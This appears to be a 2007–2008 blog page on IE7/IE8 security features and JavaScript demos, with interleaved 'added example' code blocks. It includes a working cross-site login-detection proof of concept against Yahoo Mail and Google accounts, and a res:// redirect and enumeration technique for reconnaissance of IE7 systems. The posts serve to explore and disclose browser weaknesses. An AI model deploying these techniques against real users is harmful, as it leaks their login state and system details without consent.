Anyone who has used Firefox + Zotero knows it: highly recommended, a must-have for paper writing and for organising and archiving information!

All the details are here: http://code.google.com/p/baiduzhuanli/

March 17th, 2008
Security In IE7 & IE8

I had some fun with Internet Explorer today and tested the new IE8 as well,
comparing its new security features against IE7's. There is a lot to say
about both versions. Don't get me started on the usability: to be honest it
looks horrible. You may not have noticed it, but selecting text with the
mouse has become a real challenge. It has some strange selection boundary
that ends up selecting text you don't want. Typical Microsoft. On to the
security features. You may have heard or read about a new feature called XDR
that allows cross-domain requests. If not, I'll explain it briefly here,
along with the other new features, before getting into reverse engineering
IE7 and IE8.

The XDR object.

xdr = new XDomainRequest();
xdr.open('POST', 'http://www.mr.bigglesworth.com');
xdr.send(data);

The request goes out with an XDomainRequest header, and Mr. Bigglesworth's
server has to approve it. The server opts in by returning this response
header (ASP.NET shown):

Response.AppendHeader("XDomainRequestAllowed", "1");

Great, XSS made easy. No need for hijacked iframes, CSS or images: pure
JavaScript does the trick, provided the remote server opts in, and an
attacker's own server will. A payload can now be pulled into a page from a
cooperating server over a channel that many XSS filters in use today do not
look at, so if you run one, be sure to check this beast out. In my opinion
this broadens the attack landscape, since there are more ways of launching
XSS or spreading worms. Two caveats for anyone operating a server: the opt-in
header carries no origin, so it approves every requesting site at once; only
set it on endpoints whose content is public. And XDR is designed to send no
cookies or authentication with the request, so an opted-in response can only
expose what an anonymous request would already see. Besides responseText, the
XDR object exposes these events and properties:

xdr.onerror
xdr.ontimeout
xdr.onprogress
xdr.onload
xdr.timeout

Useful, if you're into worms and all.
Next, I saw that they implemented cross-document messaging in the form of
postMessage. Opera already has it, and from a security standpoint I don't
trust it. It means that a page can send a string to any window it holds a
reference to (an iframe it embeds, or the page that opened it), whatever
origin that window belongs to, and the receiving page picks the string up by
attaching an event listener. The point of it is to let frames from different
origins talk without hacks like polling the fragment identifier, but nothing
stops a hostile page from sending, so the receiver has to check where a
message came from before acting on it. Spoofing comes to mind, and maybe
other attacks as well. Implementing it is a breeze:

page 1:

var doc = document.getElementsByTagName('iframe')[0];
// this beta's API takes a single argument: the message
doc.contentWindow.postMessage('Hello Mr. Bigglesworth!');

page 2:

document.attachEvent('onmessage', function (e) {
    // the beta reports the sender as e.domain; check it before trusting e.data
    if (e.domain == 'example.com') {
        if (e.data == 'Hello Mr. Bigglesworth!') {
            e.source.postMessage('Meow! Meow! Dr. Evil!');
        } else {
            alert(e.data);
        }
    }
});
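The receiver above keys its trust on e.domain, a bare host name, and that check is the whole security of cross-document messaging: a missing check, or a substring match, lets any page that can obtain a window reference inject messages. The block below is an added example of mine, not code from the post, showing the check a receiver should do. It is written as a pure function over the event object so it can be exercised outside a browser; the event shape (origin, data, source) is the standard postMessage event, and the allowed-origin list and the two command names are assumptions made for the example.

```javascript
// Added example: validate a cross-document message before acting on it.
// Assumes the standard MessageEvent shape: { origin, data, source }.

// Exact-match allowlist of scheme://host[:port] origins (assumed for the example).
var TRUSTED_ORIGINS = ['https://app.example.com', 'https://widgets.example.com'];

// Returns a reply object for a trusted, well-formed message, or null when the
// message must be ignored. e.data is not touched before the origin check.
function handleMessage(e, trustedOrigins) {
  // 1. Exact comparison of the full origin. A substring or indexOf-on-host check
  //    would accept https://app.example.com.attacker.tld.
  if (trustedOrigins.indexOf(e.origin) === -1) {
    return null;
  }
  // 2. Only strings are expected; refuse objects, which could carry getters.
  if (typeof e.data !== 'string') {
    return null;
  }
  // 3. A tiny "command:argument" protocol; unknown commands are dropped so the
  //    payload can never reach innerHTML or eval by accident.
  var sep = e.data.indexOf(':');
  var cmd = sep === -1 ? e.data : e.data.slice(0, sep);
  var arg = sep === -1 ? '' : e.data.slice(sep + 1);
  if (cmd === 'hello') {
    return { to: e.origin, message: 'Meow! Meow! Dr. Evil!' };
  }
  if (cmd === 'echo') {
    // Only text comes back; rendering it is the caller's job, via textContent.
    return { to: e.origin, message: 'echo:' + arg };
  }
  return null;
}

// Browser wiring (not executed outside a browser). The reply pins the sender's
// origin as targetOrigin, so it cannot leak if that frame has navigated away.
function installListener(win, trustedOrigins) {
  win.addEventListener('message', function (e) {
    var reply = handleMessage(e, trustedOrigins);
    if (reply !== null) {
      e.source.postMessage(reply.message, reply.to);
    }
  }, false);
}
```

In a page, call installListener(window, TRUSTED_ORIGINS) once; everything the listener does with a message goes through handleMessage, which is the part worth unit testing.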
Hash write access.

Another thing that caught my eye is write access to the hash of a URL.
Scripts have always been able to assign location.hash; what IE8 adds is that
each change becomes a navigation entry and fires an event (onhashchange),
which invites pages to keep state in the fragment. That doesn't sound smart,
because I don't want JavaScript manipulating the hash. Not only can it be
annoying, it can lead to security issues depending on how your site is set
up: the fragment is attacker-controllable through a crafted link, and any
script that copies it into the page or into eval is a DOM-based XSS sink.

Webslices.

If I understand it correctly, this feature lets users subscribe to a slice of
a page, either as a favorite or in their feed reader. Better expect some
parser bugs, perhaps buffer overflows, here: IE8 now scans every page it
opens for elements with the class 'hslice', so it would be nice to fuzz this
feature.

<div class="hslice" id="main">
<h2 class="entry-title">All I want are friggin' sharks with friggin' lazer
beams attached to their heads!</h2>
</div>

GlobalStorage & SessionStorage.

IE8 jumped on the Mozilla bandwagon and implemented DOM Storage: the session
and per-host storage objects. I can't say I'm impressed, because, as I said
before, allowing 10MB of data to be stored in such an object (an XML file on
disk in IE8) isn't smart, let alone making it a permanent home for user
tracking details, XSS worms and other spyware. Unlike a cookie it is never
sent to the server, but every script that runs on the host can read and
rewrite it, so one XSS turns it into persistent storage for the attacker.

IE8 GlobalStorage

<script>
var storage = globalStorage[location.hostname];
storage.some_string =
    'Ladies and Gentlemen welcome to my underground lair. ' +
    'I have gathered here before me the world\'s deadliest assassins. ' +
    'And yet each of you has failed to kill Austin Powers. ' +
    'That makes me angry. And when Dr. Evil gets angry, Mr. Bigglesworth gets upset. ' +
    'And when Mr. Bigglesworth gets upset... people DIE!!! ' +
    'Why must I be surrounded by freakin idiots. Mustafa, Frau Farbissina...';
</script>

Reverse Engineering IE7 & IE8.

Okay, this is fun. I'm going to show you a couple of things I found out about
Internet Explorer. First, IE8 no longer follows a Location header that points
at a local file. A pity, because this was pretty 'evil' in MSIE 7, where it
is still possible to redirect a page to a file stored on the visitor's own
computer. It's very simple (PHP; 'localfile' stands for whatever local path
or res:// URL you want to redirect to):

<?php
header("Location: localfile");
?>

IE7 follows it, whereas IE8 refuses. The reason this is dangerous is that IE
itself ships an XML file containing system information, which we can parse.
Useful for reconnaissance and possibly other attack schemes.

<?php
header("Location: res://ieframe.dll/24/123");
?>
Results in IE7:
<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1"
          xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" manifestVersion="1.0">
  <assemblyIdentity name="Microsoft.Windows.InetCore.ieframe" processorArchitecture="x86"
                    version="5.1.0.0" type="win32" />
  <description>Windows IE</description>
  <dependency>
    <dependentAssembly>
      <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0"
                        processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
    </dependentAssembly>
  </dependency>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="asInvoker" uiAccess="false" />
      </requestedPrivileges>
    </security>
  </trustInfo>
  <asmv3:application>
    <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
      <dpiAware>true</dpiAware>
    </asmv3:windowsSettings>
  </asmv3:application>
</assembly>
If you look closely, res://ieframe.dll/24/123 is resource 123 of type 24
(RT_MANIFEST, the application manifest) inside ieframe.dll, the DLL
registered as the IEDataObjectWrapper InProcServer32; the type-23 entries
listed below are RT_HTML. I don't know why they still allow this to be
browsable, because you can reference it from iframes, from XML and as a
JavaScript source. So I went further and enumerated all the data objects in
IE8 and a few in IE7.
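What makes the manifest worth fetching is the handful of fields that identify the build: assembly name and version, processor architecture, the Common-Controls dependency and the requested execution level. The block below is an added example of mine, not the post's code, of pulling those fields out of the manifest text; the sample input is the manifest shown above, re-embedded here as a constructed string, and the parser is deliberately regex-based so it runs outside a browser (in a page you would feed it the responseText of an XMLHttpRequest to the res:// URL).

```javascript
// Added example: extract reconnaissance-relevant fields from a Win32 application
// manifest (the XML that res://ieframe.dll/24/123 returns in IE7).

// Constructed sample input: the manifest from the post, minus whitespace.
var SAMPLE_MANIFEST =
  '<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>' +
  '<assembly xmlns="urn:schemas-microsoft-com:asm.v1" ' +
  'xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" manifestVersion="1.0">' +
  '<assemblyIdentity name="Microsoft.Windows.InetCore.ieframe" ' +
  'processorArchitecture="x86" version="5.1.0.0" type="win32" />' +
  '<description>Windows IE</description>' +
  '<dependency><dependentAssembly>' +
  '<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" ' +
  'version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />' +
  '</dependentAssembly></dependency>' +
  '<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges>' +
  '<requestedExecutionLevel level="asInvoker" uiAccess="false" />' +
  '</requestedPrivileges></security></trustInfo>' +
  '</assembly>';

// Read the name="value" attributes of one XML start tag into an object.
function parseAttributes(tagText) {
  var attrs = {};
  var re = /([\w:.-]+)\s*=\s*"([^"]*)"/g;
  var m;
  while ((m = re.exec(tagText)) !== null) {
    attrs[m[1]] = m[2];
  }
  return attrs;
}

// Collect every <assemblyIdentity .../> in document order: the first describes
// the assembly itself, the rest are its declared dependencies. Also pick up the
// requestedExecutionLevel, which says whether the binary asks for elevation.
function parseManifest(xml) {
  var identities = [];
  var re = /<assemblyIdentity\b([^>]*)\/?>/g;
  var m;
  while ((m = re.exec(xml)) !== null) {
    identities.push(parseAttributes(m[1]));
  }
  var exec = /<requestedExecutionLevel\b([^>]*)\/?>/.exec(xml);
  return {
    self: identities.length > 0 ? identities[0] : null,
    dependencies: identities.slice(1),
    executionLevel: exec ? parseAttributes(exec[1]).level : null
  };
}

// One-line fingerprint string, the kind of thing a recon script would log.
function fingerprint(xml) {
  var info = parseManifest(xml);
  if (!info.self) { return 'no assemblyIdentity found'; }
  return info.self.name + ' ' + info.self.version + ' (' +
         info.self.processorArchitecture + ', ' + info.executionLevel + ')';
}
```

The same three functions work on any other manifest you can reach through res://, since every Windows application manifest uses the same assemblyIdentity and trustInfo elements.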
IE7/8 data sources are:
res://ieframe.dll/MUI/1
res://ieframe.dll/TYPELIB/1
res://ieframe.dll/UIFILE/{20481,20482,20483,20484,20485,20486,20487,39216,41555}
res://ieframe.dll/WEVT_TEMPLATE/1
res://ieframe.dll/Version Info/1
res://ieframe.dll/23/ABOUT.js
res://ieframe.dll/23/ANALYZE.js
res://ieframe.dll/23/ANCHBRWS.js
res://ieframe.dll/23/DOCBROWS.js
res://ieframe.dll/23/ERROR.js
res://ieframe.dll/23/HTTPERRORPAGESSCRIPTS.js
res://ieframe.dll/23/IEERROR.js
res://ieframe.dll/23/IMGBROWS.js
res://ieframe.dll/23/INVALIDCERT.js
res://ieframe.dll/23/ORGFAV.js
res://ieframe.dll/23/PHISHSITE.js
res://ieframe.dll/23/POLICY.js
res://ieframe.dll/23/PREVIEW.js
res://ieframe.dll/preview.dlg (dialog)
res://ieframe.dll/23/PSTEMPLATES.js
res://ieframe.dll/24/123 (XML file)

IE6 has a few too:
res://mshtml.dll/REGINST/REGINST
res://mshtml.dll/23/ABOUT.MOZ
res://mshtml.dll/23/BLANK.HTM
res://mshtml.dll/23/REPOST.HTM
As well as others.
These are nice to play with some more. I haven't dug any deeper yet, but they
are worth a look, and they are enough building blocks to pentest IE a little
further. If you find anything notable, do let me know.

A small piece of code I wrote a while back, posted here to share and as a note to myself.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>DOM attributes enumeration POC</TITLE>
<SCRIPT LANGUAGE="JavaScript">
<!--
// List the attributes of the text box as links; clicking one shows its value.
function load_attributes()
{
    var attrs = document.getElementById("text_id").attributes;
    var div = document.getElementById("attrs_div");
    // Iterate by index: for...in over a NamedNodeMap also yields its methods.
    for (var i = 0; i < attrs.length; i++) {
        var name = attrs[i].name;
        div.innerHTML += "<li><a href='javascript:load_attrib_value(\"" + name + "\")'>" + name + "</a></li>";
    }
}
// Show the value of one attribute; in IE the collection also contains
// attributes that are not specified, so getNamedItem may return null.
function load_attrib_value(attrib)
{
    var attrs = document.getElementById("text_id").attributes;
    var namedItem = attrs.getNamedItem(attrib);
    if (namedItem)
        alert(attrib + " = " + namedItem.value);
    else
        alert(attrib + " is not specified!");
}
//-->
</SCRIPT>
</HEAD>

<BODY onload="load_attributes()">
<input id="text_id" type="text" value="text_value" name="text_box">
<p>
Text has the following attributes:
<div id="attrs_div">
</div>
</BODY>
</HTML>

Today I read an interesting article on using JavaScript to detect whether a user is logged in to certain web applications. The original gives no concrete code, but after some research I wrote a POC; in testing it only works in Firefox. IE's error messages and its error-reporting interface differ from Firefox's, and I haven't found a way to use them yet.

The test page is here.

The POC source code:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta name="refer" content="http://kentbrewster.com/patching-privacy-leaks/">
<title>JavaScript WebSite Login Checker</title>
</head>

<body>
<script>
<!--
// Hook Firefox's window.onerror: the SyntaxError message and line number that
// the parser reports for the included HTML differ between the logged-in and
// the logged-out version of each site's page.
window.onerror = err;

var sites = {};
sites['http://mail.yahoo.com/'] = {
    name: 'Yahoo Mail (Beta)',
    login_msg: 'missing } in XML expression',
    login_line: '12',
    logout_msg: 'syntax error',
    logout_line: '8'
};
sites['https://www.google.com/accounts/ManageAccount'] = {
    name: 'Google Account',
    login_msg: 'XML tag name mismatch (expected a)',
    login_line: '144',
    logout_msg: 'missing = in XML attribute',
    logout_line: '35'
};

// Include the target page as a script. It is HTML, so it fails to parse, and
// window.onerror receives the parser's message, the script URL and the line.
function check(loc) {
    var script = document.createElement('script');
    script.setAttribute('src', loc);
    script.setAttribute('type', 'text/javascript');
    var head = document.getElementsByTagName("head")[0];
    head.appendChild(script);
}

function err(msg, loc, line) {
    var site = sites[loc];
    if (!site) return;                 // an error from somewhere else
    var res = document.getElementById(site.name);
    if ((msg == site.login_msg) && (line == site.login_line)) {
        res.innerHTML = " Logged-in";
    } else {
        res.innerHTML = " Not Logged-in";
    }
    window.stop();
}

// One line per site: its name, a result span and a "check" button.
function addSite(loc)
{
    var results = document.getElementById("results");
    var subdiv = document.createElement("div");
    results.appendChild(subdiv);
    var name = document.createElement("span");
    name.innerHTML = sites[loc].name;
    subdiv.appendChild(name);

    var result = document.createElement("span");
    result.setAttribute("id", sites[loc].name);
    result.innerHTML = " ";
    subdiv.appendChild(result);
    var button = document.createElement("input");
    button.type = "button";
    button.value = "check";
    button.setAttribute("onclick", "check('" + loc + "')");
    subdiv.appendChild(button);
}
// -->
</script>
<div align="center">
<h1>JavaScript WebSite Login Checker</h1>

<div id="results"></div>
<script>
for (var i in sites) {
    addSite(i);
}
</script>
</div>
</body>
</html>

November 12th, 2007
JS Cookie Manipulation Demo

A demo of reading and writing cookies from JS, kept as a note and for reference.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Cookie Read & Write Demo</TITLE>
<SCRIPT LANGUAGE="JavaScript">
<!--
var flag;

// On load, read the stored flag (cookies hold strings, so compare to "true");
// if there is no cookie yet, create one.
if (document.cookie) {
    flag = (readCookie("flag") == "true");
} else {
    alert("no cookie yet");
    createCookie("flag", "true", 10);
    flag = true;
}

// Toggle the flag and store the new value in the cookie.
function test()
{
    if (flag) {
        flag = false;
        alert("yes");
    } else {
        flag = true;
        alert("no");
    }
    eraseCookie("flag");
    createCookie("flag", flag, 10);
}

function createCookie(name, value, days) {
    var expires = "";
    if (days) {
        var date = new Date();
        date.setTime(date.getTime() + (days * 24 * 60 * 60 * 1000));
        expires = "; expires=" + date.toGMTString();
    }
    document.cookie = name + "=" + value + expires + "; path=/";
}

function readCookie(name) {
    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for (var i = 0; i < ca.length; i++) {
        var c = ca[i];
        while (c.charAt(0) == ' ') c = c.substring(1, c.length);
        if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
    }
    return null;
}

// Expire the cookie by giving it a date in the past.
function eraseCookie(name) {
    createCookie(name, "", -1);
}

function alertCookie(name) {
    alert(readCookie(name));
}
//-->
</SCRIPT>
</HEAD>
<BODY>
<input type="button" onclick="alertCookie('flag');" value="zz">
<input type="button" onclick="test();" value="setCookie">
</BODY>
</HTML>
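The demo stores the raw value and reads it back by splitting on ';', so a value containing ';' or '=' breaks the parser, and the cookie goes out with none of the attributes that matter for security. The block below is an added example of mine, not the post's code, doing the same job with URL encoding and with the Secure, SameSite and Path attributes, plus a parser that tolerates '=' inside values. The functions work on cookie strings rather than on document.cookie so they run outside a browser; in a page you assign the result of buildCookie to document.cookie and pass document.cookie to parseCookies. HttpOnly is absent on purpose: it cannot be set from script, since its whole point is to hide the cookie from script.

```javascript
// Added example: cookie serialisation and parsing with the attributes the demo omits.

// Build the string to assign to document.cookie. Name and value are URL-encoded
// so ';', '=', ',' and whitespace can neither break the cookie nor smuggle in
// extra attributes. opts.now (ms since epoch) exists only to make expiry testable.
function buildCookie(name, value, opts) {
  opts = opts || {};
  var parts = [encodeURIComponent(name) + '=' + encodeURIComponent(String(value))];
  if (typeof opts.days === 'number') {
    var date = new Date(typeof opts.now === 'number' ? opts.now : Date.now());
    date.setTime(date.getTime() + opts.days * 24 * 60 * 60 * 1000);
    parts.push('expires=' + date.toUTCString());   // negative days: already expired
  }
  parts.push('path=' + (opts.path || '/'));
  if (opts.domain) { parts.push('domain=' + opts.domain); }
  // Secure keeps the cookie off plaintext HTTP; SameSite limits cross-site sends.
  if (opts.secure !== false) { parts.push('Secure'); }
  parts.push('SameSite=' + (opts.sameSite || 'Lax'));
  return parts.join('; ');
}

// Parse the "a=1; b=2" form that document.cookie returns. Splits each pair on
// the first '=' only, so values may contain '=', and decodes what buildCookie
// encoded; a value that is not valid percent-encoding is kept raw.
function parseCookies(cookieString) {
  var out = {};
  if (!cookieString) { return out; }
  var pairs = cookieString.split(';');
  for (var i = 0; i < pairs.length; i++) {
    var c = pairs[i].replace(/^\s+|\s+$/g, '');
    if (!c) { continue; }
    var eq = c.indexOf('=');
    var rawName = eq === -1 ? c : c.slice(0, eq);
    var rawValue = eq === -1 ? '' : c.slice(eq + 1);
    try {
      out[decodeURIComponent(rawName)] = decodeURIComponent(rawValue);
    } catch (err) {
      out[rawName] = rawValue;
    }
  }
  return out;
}

function readCookie(cookieString, name) {
  var all = parseCookies(cookieString);
  return Object.prototype.hasOwnProperty.call(all, name) ? all[name] : null;
}

// The string that deletes a cookie: empty value, expiry in the past.
function eraseCookie(name) {
  return buildCookie(name, '', { days: -1 });
}
```

Path and domain are part of the cookie's identity, so eraseCookie only removes a cookie that was set with the same defaults (path=/, no domain); pass the same opts you used when setting it if they differed.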


		

A JS snippet I wrote today. Its purpose is to send a message to the server when the user closes the browser window.
In practice the client side is not hard to implement; the only time went into browser compatibility. This version supports both IE6 and Firefox 1.5.
Below is a simple demo.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Window close test</title>
<SCRIPT LANGUAGE="JavaScript">
<!--
// Register a handler for the window's unload event (fires when the window is
// closed or navigates away); addEvent wraps the W3C and the IE event models.
addEvent(window, "unload", zz, true);
function addEvent(obj, evType, fn, useCapture) {
    if (obj.addEventListener) {
        obj.addEventListener(evType, fn, useCapture);
        return true;
    } else if (obj.attachEvent) {
        var r = obj.attachEvent("on" + evType, fn);
        return r;
    } else {
        alert("Handler could not be attached");
    }
}
function zz() {
    alert("Don't close the window!");
    window.open("http://www.newsmth.net"); // firefox will not work
}
//-->
</SCRIPT></head>

<body>
Try closing me
</body>
</html>

Firefox does not natively support the selectNodes and selectSingleNode methods that IE's XMLDOM provides. In IE these two methods evaluate an XPath expression and return a list of nodes or a single node. The script below extends Firefox's XMLDocument and Element objects to support both.

Code

selectNodes()

// check for XPath implementation
if (document.implementation.hasFeature("XPath", "3.0")) {
    // prototyping the XMLDocument
    XMLDocument.prototype.selectNodes = function (cXPathString, xNode) {
        if (!xNode) { xNode = this; }
        var oNSResolver = this.createNSResolver(this.documentElement);
        var aItems = this.evaluate(cXPathString, xNode, oNSResolver,
                                   XPathResult.ORDERED_NODE_SNAPSHOT_TYPE, null);
        var aResult = [];
        for (var i = 0; i < aItems.snapshotLength; i++) {
            aResult[i] = aItems.snapshotItem(i);
        }
        return aResult;
    };
    // prototyping the Element
    Element.prototype.selectNodes = function (cXPathString) {
        if (this.ownerDocument.selectNodes) {
            return this.ownerDocument.selectNodes(cXPathString, this);
        } else {
            throw "For XML Elements Only";
        }
    };
}

selectSingleNode()

// check for XPath implementation
if (document.implementation.hasFeature("XPath", "3.0")) {
    // prototyping the XMLDocument
    XMLDocument.prototype.selectSingleNode = function (cXPathString, xNode) {
        if (!xNode) { xNode = this; }
        var xItems = this.selectNodes(cXPathString, xNode);
        if (xItems.length > 0) {
            return xItems[0];
        } else {
            return null;
        }
    };
    // prototyping the Element
    Element.prototype.selectSingleNode = function (cXPathString) {
        if (this.ownerDocument.selectSingleNode) {
            return this.ownerDocument.selectSingleNode(cXPathString, this);
        } else {
            throw "For XML Elements Only";
        }
    };
}
Example XML document:

<root>
<complex>
<node>
<test>value 1</test>
</node>
</complex>
<complex>
<node>
<test>value 2</test>
</node>
</complex>
<complex>
<node>
<test>value 3</test>
</node>
</complex>
<complex>
<node>
<test>value 4</test>
</node>
</complex>
</root>

Usage example

function test(oXML) {
    var xItems = oXML.responseXML.selectNodes("//complex/node/test/text()");
    var sn = "XPath : //complex/node/test/text() \nMethod : selectNodes()\n";
    for (var i = 0; i < xItems.length; i++) {
        sn += "index : " + i + " | value : " + xItems[i].nodeValue + "\n";
    }
    alert(sn);
    var ssn = "XPath : //complex/node/test/text() \nMethod : selectSingleNode()\n";
    ssn += oXML.responseXML.selectSingleNode("//complex/node/test/text()").nodeValue;
    alert(ssn);
}

Original source: http://km0ti0n.blunted.co.uk/mozXPath.xap

Recently a project required generating form elements dynamically on the client side of a web page, with support for both IE and Firefox. I had never done anything like this before, so everything started from zero. The requirement is now met, and I am sharing the experience gathered along the way.
For dynamic HTML programming, IE implements two models: a narrow DHTML that works mainly by manipulating innerHTML, and the DOM (Document Object Model), which manipulates page element objects as collections (appendChild). The DHTML approach (in this article DHTML always means programming against innerHTML, not DHTML in the broad sense) manipulates HTML code fragments directly; the programmer mostly builds page elements by string concatenation. It is an efficient way to drive a dynamic page, but it feels short on programming logic, and the code tends to be littered with incomplete HTML fragments. The DOM approach is, logically, a matter of operating on collections and element objects, so the program logic is clearer, at some cost in efficiency. Which approach to use for a dynamic page is, in most cases, a matter of personal preference.
First, a brief description of my customer's requirement:
The dynamically generated UI element is a table. Clicking a button adds a row, the row contains a button, and clicking that deletes the row. The table sits inside a form, and when the form is submitted the backend receives the table's contents.
My first approach used innerHTML, with a fixed table as the parent object. This worked in Firefox 1.5.x, but in IE it threw an exception.
The exception message I caught with try...catch was "Unknown runtime error", which says nothing at all. Stare down IE for a moment! (The actual cause: in IE the innerHTML of table, tbody and tr elements is read-only.)
So I took another route in the program: detect the browser type first; if it is Firefox keep using innerHTML, otherwise build the DOM tree.
Note that it is better not to detect the browser with navigator.appName; I used object detection instead:
if (document.all && document.getElementById)
{
    //do IE
}
else
{
    //do firefox
}
With the DOM, the most common method is document.createElement(sTag), where sTag is a valid HTML tag name (tagName). Once the element object is created, we assign its properties and then insertBefore or appendChild it into the page's DOM tree. MSDN notes a few points here:

1. Frame and iframe elements cannot be created programmatically (IE 5.0 and earlier);
2. An input element is created with type='text' by default;
3. To get another input type, assign input.type before the input is inserted into the DOM tree; after it has been inserted or appended the type can no longer be changed;
4. A button element defaults to a plain button; for other button types, follow the same rule as in point 3;
5. The NAME attribute cannot be added by assigning to the element object (this is also covered in "The ID and NAME attributes of HTML elements in detail");
6. sTag is in fact not limited to an HTML tag name; any valid HTML element string works.

Now the problem I ran into. When creating the page dynamically with the DOM, I found that the initial state of input type='checkbox' and input type='radio' cannot be set the ordinary DOM way. That is, the following statements:
var input = document.createElement('INPUT');
input.type = 'checkbox';
input.checked = true;
document.body.appendChild(input);

input = document.createElement('INPUT');
input.type = 'radio';
input.checked = true;
document.body.appendChild(input);

do not give the checked controls I expected; the controls come out unchecked. (Setting checked only after the element has been appended, or setting defaultChecked, also works in IE.)

To get the expected result I had to mix the DHTML and DOM approaches, that is, build the attribute into sTag itself, with code like this:
var input = document.createElement('<INPUT checked>');
input.type = 'checkbox';
document.body.appendChild(input);

input = document.createElement('<INPUT checked>');
input.type = 'radio';
document.body.appendChild(input);

Similarly, if the created element needs to invoke a JS handler, use something like:

var input_4 = document.createElement("<input name='button' onclick='hide(\"para" + show_int + "\");'>");
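Both techniques used in this post end up handing a string to the HTML parser: the innerHTML fragments and IE's extended createElement('<input ...>') form alike. That makes every value concatenated into the string (here only a row counter, but in a real form usually a label or a value that came from the server or the user) a potential injection point. The block below is an added example of mine, not code from the post, showing the concatenation done safely: values pass through an attribute-escaping helper, the counter is forced numeric, and the handler reads its target from a data attribute instead of from a quoted literal spliced into onclick. The element and handler names are assumptions; the functions are pure and return the string you would assign to innerHTML or pass to IE's createElement, so they can be checked outside a browser, and the unsafe variant is kept beside them for contrast.

```javascript
// Added example: safe string construction for the innerHTML / extended-createElement approach.

// Escape text for use inside a double-quoted HTML attribute or as element text.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Build one table row of the dynamic form: a label, a text field and a delete
// button. index is the row counter; label may come from user or server data.
function buildRowHtml(index, label) {
  var n = Number(index);                      // force numeric: an id cannot carry markup
  var id = 'para' + n;
  var safeLabel = escapeHtml(label);
  return '<tr id="' + id + '">' +
         '<td>' + safeLabel + '</td>' +
         '<td><input type="text" name="row_' + n + '" value="' + safeLabel + '"></td>' +
         // The handler reads the id from a data attribute, so no user data is ever
         // quoted inside a script literal.
         '<td><input type="button" value="delete" data-target="' + id + '"' +
         ' onclick="hide(this.getAttribute(\'data-target\'))"></td>' +
         '</tr>';
}

// Unsafe variant in the style of the post, shown for contrast: the label and the
// counter are spliced in raw, so a label like <img src=x onerror=...> executes.
function buildRowHtmlUnsafe(index, label) {
  return '<tr id="para' + index + '"><td>' + label + '</td></tr>';
}

// Browser-side helper (not executed outside a browser): the IE branch passes the
// finished string to createElement, Firefox gets a DOM node built from it.
function createRow(doc, index, label) {
  var html = buildRowHtml(index, label);
  if (doc.all && doc.getElementById) {          // the post's IE test
    return doc.createElement(html);
  }
  var tbody = doc.createElement('tbody');
  tbody.innerHTML = html;
  return tbody.firstChild;
}
```

The same escapeHtml covers the onclick case from the post as well: if show_int could ever be non-numeric, escaping it (or forcing it through Number as above) is what keeps the handler string closed.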


© 2007 猪在笑 | Powered by WordPress